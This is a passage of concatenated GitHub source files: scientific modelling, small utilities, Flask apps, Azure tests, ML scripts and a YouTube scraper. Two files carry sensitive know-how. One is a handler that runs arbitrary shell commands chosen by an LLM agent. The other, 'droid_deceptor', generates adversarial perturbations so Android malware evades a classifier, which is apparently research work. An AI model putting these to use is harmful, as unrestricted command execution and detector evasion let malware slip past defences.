True)\n","repo_name":"aansheng/turbotools","sub_path":"tests/test_date.py","file_name":"test_date.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"20095366452","text":"\"\"\"Abstract class for models of Isolates.\"\"\"\n\nfrom microbepy.common import constants as cn\nfrom microbepy.common import util\n\nimport pandas as pd\nimport numpy as np\n\nISPERMITTEDROW = lambda r: True\n\nALPHA_AVG = \"alpha_avg\"\nALPHA_STD = \"alpha_std\"\nBETA_AVG = \"beta_avg\"\nBETA_STD = \"beta_std\"\nGAMMA_AVG = \"gamma_avg\"\nGAMMA_STD = \"gamma_std\"\nGAMMA = \"gamma\"\nALPHA = \"alpha\"\n\n\nclass IsolateModel(object):\n \"\"\"\n Abstract class.\n Interface used with CrossValidation. Represents a model that\n does a single estimate. The IsolateModel is responsible\n for accessing its own data.\n Key concepts:\n key_names - names of columns that constitute a key for models\n key_values - values for a key\n isIndex - a function of an int that returns a bool\n This is used to select data subsets for estimation\n and prediction\n Note that there are separate methods for estimate and predict\n since different subsets of data may be used to estimate\n parameters vs. predict values of dependent variables.\n \"\"\"\n # Dictionary of dataframes keyed by RATE, YIELD\n # cn.KEY_ISOLATE_DVH, cn.KEY_ISOLATE_MMP, cn.LINE,\n # cn.KEY_CULTURE, cn.DEPVAR\n dfs_coculture = {}\n # Dictionary of dataframes for ancestral pairings. 
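Built lazily by _makeAncestralDFS().\n # 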
Keyed by RATE, YIELD\n # cn.KEY_ISOLATE, cn.cn.AVG, cn.cn.STD\n dfs_ancestral = {}\n\n def __init__(self, key_values, isPermittedRow=ISPERMITTEDROW,\n **kwargs):\n \"\"\"\n :param object model_id: identifies the model to construct\n \"\"\"\n pass\n\n @classmethod\n def _getData(cls):\n cls._makeCocultureDFS()\n cls._makeAncestralDFS()\n\n @classmethod\n def resetDFS(cls):\n cls.dfs_coculture = {}\n cls.dfs_ancestral = {}\n\n def getDataSize(self):\n \"\"\"\n Provides the number of data elements\n :return int:\n \"\"\"\n raise RuntimeError(\"Must override!\")\n\n @classmethod\n def makeCultureIsolateDF(cls, cocultures=None):\n \"\"\"\n Creates a dataframe with the DVH and MMP isolates for the cocultures.\n :param list-of-str cocultures:\n :return pd.DataFrame: KEY_CULTURE, KEY_ISOLATE_DVH, KEY_ISOLATE_MMP\n \"\"\"\n df = cls._makeCocultureDFS()[cn.RATE]\n if cocultures is None:\n cocultures = df[cn.KEY_CULTURE].tolist()\n df_result = pd.DataFrame([r for _,r in df.iterrows()\n if r[cn.KEY_CULTURE] in cocultures])\n df_result = df_result[[cn.KEY_CULTURE, cn.KEY_ISOLATE_DVH,\n cn.KEY_ISOLATE_MMP]].copy()\n return df_result\n \n\n @classmethod\n def _makeAncestralDFS(cls):\n \"\"\"\n Computes values in ancestral pairings.\n Creates dict-of-pd.DataFrame: keyed by cn.RATE, cn.YIELD. Columns:\n cn.KEY_ISOLATE (INDEX)\n cn.AVG\n cn.STD - standard deviation of the average\n \"\"\"\n # TODO: Change when change from WT to AN\n anpat = \"%s%%\" % cn.LINE_AN # Avoid python interpreting '%'\n def makeDF(depvar):\n query = '''\n select distinct key_isolate,\n key_culture as key_culture_ev, key_isolate_an, %s\n from %s,\n (select distinct key_isolate as key_isolate_an, \n key_culture as key_culture_wt from %s) sub\n where key_culture_ev = key_culture_wt\n and key_isolate not like (\"%s\")\n \tand key_isolate_an like(\"%s\")\n order by key_isolate, key_isolate_an\n ''' % (depvar, cn.TABLE_CULTURE_ISOLATE_MUTATION,\n cn.TABLE_CULTURE_ISOLATE_MUTATION, anpat, anpat)\n df = util.readSQL(query)\n df = df[[cn.KEY_ISOLATE, depvar]].drop_duplicates()\n groupby = df.groupby(cn.KEY_ISOLATE)\n result = groupby.mean()\n result.rename(columns={depvar: cn.AVG}, inplace=True)\n result[cn.STD] = groupby.std()[depvar]\n result[cn.COUNT] = groupby.count()\n result[cn.STD] = [r[cn.STD]/np.sqrt(r[cn.COUNT])\n for _,r in result.iterrows()]\n del result[cn.COUNT]\n return result\n #\n if len(cls.dfs_ancestral) == 0:\n for depvar in [cn.RATE, cn.YIELD]:\n cls.dfs_ancestral[depvar] = makeDF(depvar)\n return cls.dfs_ancestral\n\n @classmethod\n def _makeCocultureDFS(cls):\n \"\"\"\n Computes the values of the dependent variable\n Constructs a dictionary indexed by depvar with pd.DataFrame:\n cn.KEY_CULTURE\n cn.LINE\n cn.KEY_ISOLATE_DVH\n cn.KEY_ISOLATE_MMP\n cn.DEPVAR\n \"\"\"\n def makeDF(depvar):\n query = '''\n select distinct \n key_culture, line,\n key_isolate as key_isolate_dvh, \n key_isolate_mmp, \n %s\n from genotype_phenotype,\n (select distinct key_isolate as key_isolate_mmp, \n transfer as transfer_mmp,\n key_culture as key_culture_mmp from genotype_phenotype \n where species='%s' and transfer_mmp=%d) sub\n where species_mix = '%s' \n and transfer = %d\n and key_culture is not null \n and key_isolate is not null\n and species = '%s' \n and key_culture_mmp = key_culture\n ''' % (depvar, cn.SPECIES_MIX_MMP, cn.TRANSFER_1000G, \n cn.SPECIES_MIX_BOTH, cn.TRANSFER_1000G,\n cn.SPECIES_MIX_DVH)\n df = util.readSQL(query)\n df.rename(columns={depvar: cn.DEPVAR}, inplace=True)\n return df\n #\n if len(cls.dfs_coculture) == 
0:\n for depvar in [cn.RATE, cn.YIELD]:\n cls.dfs_coculture[depvar] = makeDF(depvar)\n return cls.dfs_coculture\n\n @classmethod\n def makeEstimateDFS(cls, cvsize=3, depvar=cn.RATE,\n isPermittedRow=ISPERMITTEDROW):\n \"\"\"\n :param int cvsize: size of the cross validation set\n :param str depvar: dependent variable\n :param function isPermittedRow: True if row is permitted\n allows for filtering\n :return dict: Cross validation dataframes\n \"\"\"\n # CrossValidation is expected to be provided by the surrounding package\n cross = CrossValidation(cls, cvsize, depvar=depvar,\n isPermittedRow=isPermittedRow)\n return cross.estimate()\n\n @classmethod\n def getKeyValues(cls):\n \"\"\"\n :return list-of-str: Names of the keys for the models\n \"\"\"\n raise RuntimeError(\"Must override!\")\n\n def estimate(self, isIndex=lambda x: True, **kwargs):\n \"\"\"\n :param function isIndex:\n arg: int; returns bool\n :return pd.DataFrame: df_estimate\n key columns - those specified in getKeys \n columns - names of model parameters estimated\n \"\"\"\n raise RuntimeError(\"Must override!\")\n\n def predict(self, isIndex=lambda x: True):\n \"\"\"\n :param function isIndex:\n :return pd.DataFrame:\n key columns - those specified in getKeys \n cn.ESTIMATE - estimated value\n OBSERVED\n \"\"\"\n raise RuntimeError(\"Must override!\")\n","repo_name":"ScienceStacks/microbepy","sub_path":"microbepy/model/isolate_model.py","file_name":"isolate_model.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"23470705912","text":"import os\nimport sys\n\nimport zipfile\nfrom zipfile import ZipFile\n\nimport shutil\n\nclass Zip():\n\t\n\tdef __init__(self):\n\t\t\n\t\tself.nameFolder = 'ZIP/'\n\t\tself.nameZipFile = None\n\t\tself.thisfile = None\n\t\tself.phrase = 'Hola' # default greeting text so Saludar() does not hit an undefined attribute\n\n\tdef Saludar(self):\n\t\tprint(self.phrase)\n\n\tdef CreateFile(self, task):\n\t\tself.nameZipFile = self.nameFolder + 'Task' + str(task) + '.zip'\n\t\t\n\t\tself.thisfile = ZipFile(self.nameZipFile, 'a', zipfile.ZIP_DEFLATED)\n\t\t\n\t\tsrc_files = os.listdir('/tmp/')\n\t\t\n\t\tsrc_files_jpg = list()\n\t\n\t\tfor i in range(len(src_files)):\n\t\t\tif src_files[i].startswith('image_' + str(task) + '_') and src_files[i].endswith('.jpg'):\n\t\t\t\tsrc_files_jpg.append(src_files[i])\n\t\t\t\t\n\t\tsrc_files_order_jpg = sorted(src_files_jpg)\n\t\t\n\t\tfor i in range(len(src_files_order_jpg)):\n\t\t\tcheckFile = os.path.isfile('/tmp/' + src_files_order_jpg[i])\n\t\t\tif checkFile:\n\t\t\t\tshutil.copy('/tmp/' + src_files_order_jpg[i], self.nameFolder)\n\t\t\t\tself.thisfile.write(self.nameFolder + src_files_order_jpg[i])\n\t\t\t\tos.remove(self.nameFolder + src_files_order_jpg[i])\t\t\n\n\t\tself.thisfile.close()\n","repo_name":"juanen1602/API_Camera_DMK","sub_path":"ZIP/dwlZip.py","file_name":"dwlZip.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"20299061322","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = \"ipetrash\"\n\n\ndef hex2str(hex_string: str, encoding=\"utf-8\") -> str:\n data = bytes.fromhex(hex_string)\n return str(data, encoding)\n\n\ndef str2hex(text: str, encoding=\"utf-8\", upper=True) -> str:\n hex_text = bytes(text, encoding).hex()\n if upper:\n hex_text = hex_text.upper()\n\n return hex_text\n\n\nif __name__ == \"__main__\":\n assert hex2str(\"504F53542068747470733A\") == \"POST https:\"\n assert str2hex(hex2str(\"504F53542068747470733A\")) == \"504F53542068747470733A\"\n assert (\n 
str2hex(hex2str(\"504F53542068747470733A\"), upper=False)\n == \"504f53542068747470733a\"\n )\n assert str2hex(\"POST https:\") == \"504F53542068747470733A\"\n assert hex2str(str2hex(\"POST https:\")) == \"POST https:\"\n assert hex2str(str2hex(\"Привет мир!\")) == \"Привет мир!\"\n assert hex2str(str2hex(\"⌚⏰☀☁☔☺\")) == \"⌚⏰☀☁☔☺\"\n\n hex_text = \"504F53542068747470733A\"\n text = hex2str(hex_text)\n print(f'\"{text}\"')\n\n text = \"POST https:\"\n hex_text = str2hex(text)\n print(hex_text)\n","repo_name":"gil9red/SimplePyScripts","sub_path":"hex2str/hex2str.py","file_name":"hex2str.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"5"} +{"seq_id":"11577949513","text":"class NameNotFound(Exception):\r\n def __init__(self, msg=\"Name not found\"):\r\n Exception.__init__(self, msg)\r\n\r\n\r\ntry:\r\n names = [\"Sachin\", \"Saurav\", \"Rahul\"]\r\n name = input(\"Enter name: \")\r\n if name not in names:\r\n raise NameNotFound\r\n print(\"Welcome \" + name)\r\nexcept NameNotFound as e:\r\n print(e)\r\n","repo_name":"shubh4197/Python","sub_path":"PycharmProjects/day4/program3.py","file_name":"program3.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20293993362","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = \"ipetrash\"\n\n\n# SOURCE: https://github.com/mozilla/bleach\n# SOURCE: https://bleach.readthedocs.io/en/latest/linkify.html#using-bleach-linkifier-linkifyfilter\n\n\nfrom functools import partial\n\n# pip install bleach\nfrom bleach import Cleaner\nfrom bleach.linkifier import LinkifyFilter\n\n\nhtml = \"
<pre>http://example.com</pre>
\"\n\ncleaner = Cleaner(tags=[\"pre\"])\nprint(cleaner.clean(html))\n#
<pre>http://example.com</pre>
\n\ncleaner = Cleaner(tags=[\"pre\"], filters=[LinkifyFilter])\nprint(cleaner.clean(html))\n#
<pre><a href=\"http://example.com\" rel=\"nofollow\">http://example.com</a></pre>
\n\nprint(\"\\n\" + \"-\" * 100 + \"\\n\")\n\n# skip_tags (list) – list of tags that you don’t want to linkify\n# the contents of; for example, you could set this to ['pre']\n# to skip linkifying contents of pre tags\ncleaner = Cleaner(\n tags=[\"pre\"],\n filters=[\n partial(LinkifyFilter, skip_tags=[\"pre\"]),\n ]\n)\nprint(cleaner.clean(html))\n#
<pre>http://example.com</pre>
\n","repo_name":"gil9red/SimplePyScripts","sub_path":"bleach__examples__remove_tags__clear_html/class_LinkifyFilter.py","file_name":"class_LinkifyFilter.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"5"} +{"seq_id":"4214921863","text":"from flask import Flask, render_template, redirect, session, flash, request\nimport random\n\napp = Flask(__name__)\napp.secret_key = 'idontno'\n\n@app.route('/')\ndef index():\n if 'gold' not in session:\n session['gold'] = 0\n session['status'] = \"The ninja has gone nowhere so far.\"\n return render_template('index.html')\n\n@app.route('/process', methods=['POST'])\ndef process():\n if request.form['select_it'] == 'Farm': \n session['amount'] = random.randrange(10, 21) \n session['gold'] += session['amount']\n session['status'] += \" You got the ninja \" + str(session['amount']) + \" pieces of gold.\"\n return redirect('/')\n elif request.form['select_it'] == 'Cave': \n session['amount'] = random.randrange(5, 11)\n session['gold'] += session['amount']\n session['status'] += \" You got the ninja \" + str(session['amount']) + \" pieces of gold.\"\n return redirect('/')\n elif request.form['select_it'] == 'House': \n session['amount'] = random.randrange(2, 5)\n session['gold'] += session['amount']\n session['status'] += \" The ninja commit a B&E and stole \" + str(session['amount']) + \" pieces of gold... killing \" + str(random.randrange(1, 11)) + \" in the process.\"\n return redirect('/')\n elif request.form['select_it'] == 'Casino': \n session['amount'] = random.randrange(0, 51)\n session['gold'] += session['amount']\n session['status'] += \" You got the ninja \" + str(session['amount']) + \" pieces of gold.\"\n return redirect('/')\n \n return render_template('index.html')\n \n@app.route('/reset', methods=[\"POST\"]) \ndef reset():\n if request.form['reset_it'] == 'zero_it':\n session.pop('gold')\n session.pop('status')\n return redirect('/')\n\napp.run(debug=True)\n","repo_name":"rockomatthews/Dojo","sub_path":"Python/Flask_Fundamentals/ninjaGold/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73836863832","text":"import os\nimport re\nimport yaml\nimport shlex\nimport subprocess\nimport logging\nfrom subprocess import check_output\nfrom typing import List, Tuple\nfrom src.handlers.handler import Handler\nfrom src.container_config import container\nfrom src.config_manager import ConfigManager\nfrom src.handlers.quokka_loki import QuokkaLoki\nfrom src.handlers.handler_utils import get_base_path, execute_script\n\n\n\nclass CommandExecutionHandler(Handler): \n functDef = {\n \"name\": \"execute_command\",\n \"description\": \"execute a OS command in a given location\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"command\": {\n \"type\": \"string\",\n \"description\": \"the command to be executed - assumes linux bash\",\n },\n \"working_directory\": {\"type\": \"string\", \n \"description\": \"the working directory relative to the home folder that the command will execute in \",},\n },\n \"required\": [\"command\", \"working_directory\"],\n },\n }\n \n def get_function_calling_definition(self):\n return self.functDef\n \n\n def handle(self, action: dict, account_name:str = \"auto\") -> List[dict]:\n\n action_name = action['action_name']\n if action_name not in [\"action_execute_command\", 
\"execute_command\"]:\n return None\n \n logging.info(self.__class__.__name__ )\n \n command = action['command'] \n working_directory = action['working_directory'] \n\n config = container.get(ConfigManager) \n base_path = get_base_path(config, account_name, working_directory)\n\n result = execute_script(command, base_path)\n\n temp = [{\"result\": result},{ \"handler\": self.__class__.__name__} ]\n temp.append(action)\n return temp\n\n \n \n \n\n ","repo_name":"junwin/lucy","sub_path":"src/handlers/command_execution_handler.py","file_name":"command_execution_handler.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70712959513","text":"groups = {\n \"1\": {\"Denmark\", \"England\", \"France\", \"Sweden\"},\n \"2\": {\"CIS\", \"Germany\", \"Netherlands\", \"Scotland\"}\n}\n\nmatches = [\n (\"Sweden\", 1, 1, \"France\"),\n (\"Denmark\", 0, 0, \"England\"),\n (\"Netherlands\", 1, 0, \"Scotland\"),\n (\"CIS\", 1, 1, \"Germany\"),\n (\"France\", 0, 0, \"England\"),\n (\"Sweden\", 1, 0, \"Denmark\"),\n]\n","repo_name":"AnneSpitz/TDLog-TP1","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70357850713","text":"import os\nfrom flask import render_template\nfrom droid_deceptor.controllers.feature_extractor import extract_features\nimport droid_deceptor.controllers.malware_classification as Classifiers\nfrom droid_deceptor.controllers.attacks import Attacks\n\n\ndef generate_attack(features, results):\n attack = Attacks()\n\n attack.model = Classifiers.svm_classifier\n attack.apk_vector = features\n\n adversarial_example = attack.jsma_attack(max_perturbations= 10)\n perturbations = attack.features_names(adversarial_example)\n return perturbations\n\n\ndef get_apk(files):\n UPLOAD_FOLDER = 'droid_deceptor/uploads'\n\n message, uploaded_file, features = None, None, None\n\n # Check if the 'file' field is in the request\n if 'file' not in files:\n message = \"No file Uploaded\"\n\n file = files['file']\n\n # Check if the user submitted an empty file input\n if file.filename == '':\n message = \"No selected file\"\n\n if file:\n # Ensure the folder exists\n os.makedirs(UPLOAD_FOLDER, exist_ok=True)\n\n # Save the uploaded APK file to the UPLOAD_FOLDER\n file.save(os.path.join(UPLOAD_FOLDER, file.filename))\n uploaded_file = file.filename\n message = \"File Saved\"\n\n # extract features\n features = extract_features(file.filename)\n apk_vector = Classifiers.prepare_input(features)\n\n # check if its a malware or not\n results = Classifiers.malware_classifier(apk_vector)\n perturbations = generate_attack(apk_vector, results)\n\n return render_template('upload.html', message=message, uploaded_file=uploaded_file, features=features, results=results, perturbations=perturbations)","repo_name":"Moghees244/Droid_Deceptor","sub_path":"droid_deceptor/controllers/apk_upload.py","file_name":"apk_upload.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3042001064","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"login\", views.login, name=\"login\"),\n path(\"logout\", views.logout, name=\"logout\"),\n path(\"checkout\", views.checkout, name=\"cart\"),\n path(\"logOrder\", views.logOrder, name=\"logOrder\"),\n path(\"deleteOrder\", views.deleteOrder, name=\"deleteOrder\"),\n path(\"paidOrder\", views.paidOrder, name=\"paidOrder\"),\n path(\"viewOrders\", views.viewOrders, name=\"viewOrders\"),\n path(\"updateMenu\", views.updateMenu, name=\"updateMenu\"),\n path(\"addNewItem\", views.addNewItem, name=\"addNewItem\"),\n path(\"removeMenuItem\", views.removeMenuItem, name=\"removeMenuItem\"),\n]\n","repo_name":"DShaulov/CS50-Web-Project-3-PizzaShop","sub_path":"orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40136832158","text":"import os\nimport unittest\n\nfrom azure.cli.testsdk.scenario_tests import AllowLargeResponse\nfrom azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer)\nfrom .recording_processors import KeyReplacer\n\n\nTEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))\n\n\nclass WebpubsubScenarioTest(ScenarioTest):\n\n def __init__(self, method_name):\n super(WebpubsubScenarioTest, self).__init__(\n method_name, recording_processors=[KeyReplacer()]\n )\n\n @ResourceGroupPreparer(random_name_length=20)\n def test_webpubsub(self, resource_group):\n tags_key = 'key'\n tags_val = 'value'\n updated_tags_val = 'value2'\n\n self.kwargs.update({\n 'name': self.create_random_name('webpubsub', 16),\n 'sku': 'Standard_S1',\n 'location': 'eastus',\n 'tags': '{}={}'.format(tags_key, tags_val),\n 'unit_count': 1,\n 'updated_tags': '{}={}'.format(tags_key, updated_tags_val),\n 'updated_sku': 'Free_F1'\n })\n\n # Test create\n self.cmd('webpubsub create -g {rg} -n {name} --tags {tags} -l {location} --sku {sku} --unit-count {unit_count}', checks=[\n self.check('name', '{name}'),\n self.check('location', '{location}'),\n self.check('provisioningState', 'Succeeded'),\n self.check('sku.name', '{sku}'),\n self.check('sku.capacity', '{unit_count}'),\n self.check('tags.{}'.format(tags_key), tags_val),\n self.exists('hostName'),\n self.exists('publicPort'),\n self.exists('serverPort'),\n self.exists('externalIp'),\n ])\n\n # Test show\n self.cmd('webpubsub show -g {rg} -n {name}', checks=[\n self.check('name', '{name}'),\n self.check('location', '{location}'),\n self.check('provisioningState', 'Succeeded'),\n self.check('sku.name', '{sku}'),\n self.check('sku.capacity', '{unit_count}'),\n self.exists('hostName'),\n self.exists('publicPort'),\n self.exists('serverPort'),\n self.exists('externalIp'),\n ])\n\n # Test list\n self.cmd('webpubsub list -g {rg}', checks=[\n self.check('[0].name', '{name}'),\n self.check('[0].location', '{location}'),\n self.check('[0].provisioningState', 'Succeeded'),\n self.check('[0].sku.name', '{sku}'),\n self.check('[0].sku.capacity', '{unit_count}'),\n self.exists('[0].hostName'),\n self.exists('[0].publicPort'),\n self.exists('[0].serverPort'),\n self.exists('[0].externalIp'),\n ])\n\n # Test update\n self.cmd('webpubsub update -g {rg} -n {name} --tags {updated_tags} --sku {updated_sku}', checks=[\n self.check('name', '{name}'),\n self.check('location', '{location}'),\n self.check('provisioningState', 'Succeeded'),\n self.check('sku.name', '{updated_sku}'),\n 
self.check('tags.{}'.format(tags_key), updated_tags_val),\n self.exists('hostName'),\n self.exists('publicPort'),\n self.exists('serverPort'),\n self.exists('externalIp'),\n ])\n\n # Test key show\n self.cmd('webpubsub key show -n {name} -g {rg}', checks=[\n self.exists('primaryKey'),\n self.exists('secondaryKey')\n ])\n\n # Test list skus\n self.cmd('webpubsub list-skus -n {name} -g {rg}', checks=[\n self.check('[0].sku.name', 'Free_F1'),\n self.check('[1].sku.name', 'Standard_S1')\n ])\n\n # Test list usage\n self.cmd('webpubsub list-usage -l {location}', checks=[\n self.check('[0].name.value', 'FreeTierInstances'),\n self.check('[1].name.value', 'SignalRTotalUnits')\n ])\n\n # Test key regenerate\n self.cmd('webpubsub key regenerate -n {name} -g {rg} --key-type secondary', checks=[\n self.exists('primaryKey'),\n self.exists('secondaryKey')\n ])\n\n # Test key regenerate salt\n self.cmd('webpubsub key regenerate -n {name} -g {rg} --key-type salt', checks=[\n self.exists('primaryKey'),\n self.exists('secondaryKey')\n ])\n\n # Test delete\n count = len(self.cmd('webpubsub list').get_output_in_json())\n self.cmd('webpubsub delete -g {rg} -n {name}')\n final_count = len(self.cmd('webpubsub list').get_output_in_json())\n self.assertTrue(final_count == count - 1)\n","repo_name":"Azure/azure-cli-extensions","sub_path":"src/webpubsub/azext_webpubsub/tests/latest/test_webpubsub_scenario.py","file_name":"test_webpubsub_scenario.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","stars":350,"dataset":"github-code","pt":"5"} +{"seq_id":"26983541849","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\nimport skimage\nfrom skimage import data,exposure\nimport matplotlib.pyplot as plt\n\nclass TOD(object):\n def __init__(self):\n # self.PATH_TO_CKPT = 'D:/models/ssd_mobilenet_v2_coco_2018_03_29/frozen_inference_graph.pb'\n self.PATH_TO_CKPT2 = r'D:\\models\\ssd_mobilenet_v2_coco_2018_03_29\\saved_model'\n self.PATH_TO_LABELS = r'D:\\projects\\tensorflowModelGarden\\research\\object_detection\\data\\mscoco_label_map.pbtxt'\n self.NUM_CLASSES = 90\n\n self.category_index = self._load_label_map()\n\n\n def _load_label_map(self):\n label_map = label_map_util.load_labelmap(self.PATH_TO_LABELS)\n categories = label_map_util.convert_label_map_to_categories(label_map,\n max_num_classes=self.NUM_CLASSES,\n use_display_name=True)\n category_index = label_map_util.create_category_index(categories)\n return category_index\n\n def get_detect_result(self, image):\n\n\n with tf.Session(graph=tf.Graph()) as sess:\n # tf.saved_model.load(sess, [\"serve\"], self.PATH_TO_CKPT2)\n tf.saved_model.load(sess, [\"serving_default\"], self.PATH_TO_CKPT2)\n graph = tf.get_default_graph()\n\n image_np_expanded = np.expand_dims(image, axis=0)\n image_tensor = graph.get_tensor_by_name('image_tensor:0')\n boxes = graph.get_tensor_by_name('detection_boxes:0')\n scores =graph.get_tensor_by_name('detection_scores:0')\n classes = graph.get_tensor_by_name('detection_classes:0')\n num_detections = graph.get_tensor_by_name('num_detections:0')\n # Actual detection.\n\n (boxes, scores, classes, num_detections) = sess.run(\n [boxes, scores, classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n # Visualization of the results of a detection.\n image2 = vis_util.visualize_boxes_and_labels_on_image_array(\n image,\n np.squeeze(boxes),\n 
np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n self.category_index,\n use_normalized_coordinates=True,\n line_thickness=8)\n\n return image2\n\n\n\nif __name__ == '__main__':\n image_ori = cv2.imread(r'D:\\dataset\\traffic_state_predict\\amap_traffic_train_0712\\000001\\1_2019-03-10-18-08-08.jpg')\n\n # cv2.imshow(\"ori\", image_ori)\n # cv2.waitKey(0)\n\n detecotr = TOD()\n image2 = detecotr.get_detect_result(image_ori)\n cv2.imshow(\"detection\", image2)\n cv2.waitKey(0)\n\n\n\n","repo_name":"ljq2278/models","sub_path":"research/my_shell/detect_mobilenet/tf1_predict_useSavedModel.py","file_name":"tf1_predict_useSavedModel.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"23137740218","text":"import time\n\nimport torch\nfrom torch import nn\nimport torch.utils.data as torch_data\nimport torchvision\nimport matplotlib.pyplot as plt\n\nfrom vanilla_autoencoder import AutoEncoder\n\n\ndef sparse_loss_l1(model, images):\n model_children = list(model.children())\n loss = 0\n values = images\n for i in range(len(model_children)):\n values = torch.relu((model_children[i](values)))\n loss += torch.mean(torch.abs(values))\n return loss\n\n\ndef kl_divergence(rho, rho_hat):\n rho_hat = torch.mean(torch.sigmoid(rho_hat), 1)\n rho = torch.tensor([rho] * len(rho_hat)).to(device)\n return torch.sum(rho * torch.log(rho / rho_hat) + (1 - rho) * torch.log(\n (1 - rho) / (1 - rho_hat)))\n\n\ndef sparse_loss_kl(model, images):\n model_children = list(model.children())\n loss = 0\n values = images\n for i in range(len(model_children)):\n values = torch.relu((model_children[i](values)))\n loss += kl_divergence(0.05, values)\n return loss\n\n\ndef fit(model, dataloader, optimizer, lambd):\n model.train()\n running_loss = .0\n counter = 0\n for step, (x, b_label) in enumerate(dataloader):\n counter += 1\n x = x.to(device)\n b_x = x.view(-1, 28 * 28)\n b_y = x.view(-1, 28 * 28)\n optimizer.zero_grad()\n encoded, decoded = model(b_x)\n # loss = nn.MSELoss()(decoded, b_y) + lambd * sparse_loss_l1(model, b_x)\n loss = nn.MSELoss()(decoded, b_y) + lambd * sparse_loss_kl(model, b_x)\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n\n epoch_loss = running_loss / counter\n return epoch_loss\n\n\nif __name__ == '__main__':\n # device = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n device = 'cpu'\n\n EPOCH = 5\n BATCH_SIZE = 64\n LR = 0.005\n N_TEST_IMG = 5\n\n train_data = torchvision.datasets.MNIST(\n root='datasets/mnist',\n train=True,\n transform=torchvision.transforms.ToTensor(),\n download=True\n )\n\n train_loader = torch_data.DataLoader(\n dataset=train_data,\n batch_size=BATCH_SIZE,\n shuffle=True\n )\n\n model = AutoEncoder()\n\n # train and validate the autoencoder neural network\n train_loss = []\n start = time.time()\n optimizer = torch.optim.Adam(model.parameters(), lr=LR)\n for epoch in range(EPOCH):\n print(f\"Epoch {epoch + 1} of {EPOCH}\")\n train_epoch_loss = fit(model, train_loader, optimizer, 0.001)\n train_loss.append(train_epoch_loss)\n end = time.time()\n\n print(f\"{(end - start) / 60:.3} minutes\")\n # save the trained model\n torch.save(model.state_dict(),\n f\"result/sparse_autoencoder/sparse_ae{EPOCH}.pth\")\n\n plt.figure(figsize=(10, 7))\n plt.plot(train_loss, color='orange', label='train loss')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n plt.savefig('result/sparse_autoencoder/loss.png')\n 
plt.show()\n","repo_name":"victoryfb/autoencoders","sub_path":"sparse_autoencoder.py","file_name":"sparse_autoencoder.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71301500632","text":"import json\r\nimport pandas as pd\r\nfrom csv import writer\r\nimport time\r\nfrom urllib.request import urlopen\r\nvid = pd.read_csv(\"vidid.csv\")\r\napi=\"youryoutubeapihere\"\r\ndef yttimeconvert(duration):\r\n day_time = duration.split('T')\r\n day_duration = day_time[0].replace('P', '')\r\n day_list = day_duration.split('D')\r\n if len(day_list) == 2:\r\n day = int(day_list[0]) * 60 * 60 * 24\r\n day_list = day_list[1]\r\n else:\r\n day = 0\r\n day_list = day_list[0]\r\n hour_list = day_time[1].split('H')\r\n if len(hour_list) == 2:\r\n hour = int(hour_list[0]) * 60 * 60\r\n hour_list = hour_list[1]\r\n else:\r\n hour = 0\r\n hour_list = hour_list[0]\r\n minute_list = hour_list.split('M')\r\n if len(minute_list) == 2:\r\n minute = int(minute_list[0]) * 60\r\n minute_list = minute_list[1]\r\n else:\r\n minute = 0\r\n minute_list = minute_list[0]\r\n second_list = minute_list.split('S')\r\n if len(second_list) == 2:\r\n second = int(second_list[0])\r\n else:\r\n second = 0\r\n return day + hour + minute + second\r\ndef main(urs):\r\n url = \"https://youtube.googleapis.com/youtube/v3/videos?part=snippet%2CcontentDetails%2Cstatistics&id=\"+urs+\"&key=\"+api\r\n response = urlopen(url)\r\n json_load = json.loads(response.read())\r\n\r\n try:\r\n vidtitle=json_load['items'][0]['snippet']['title']\r\n except:\r\n vidtitle=\"\"\r\n try:\r\n 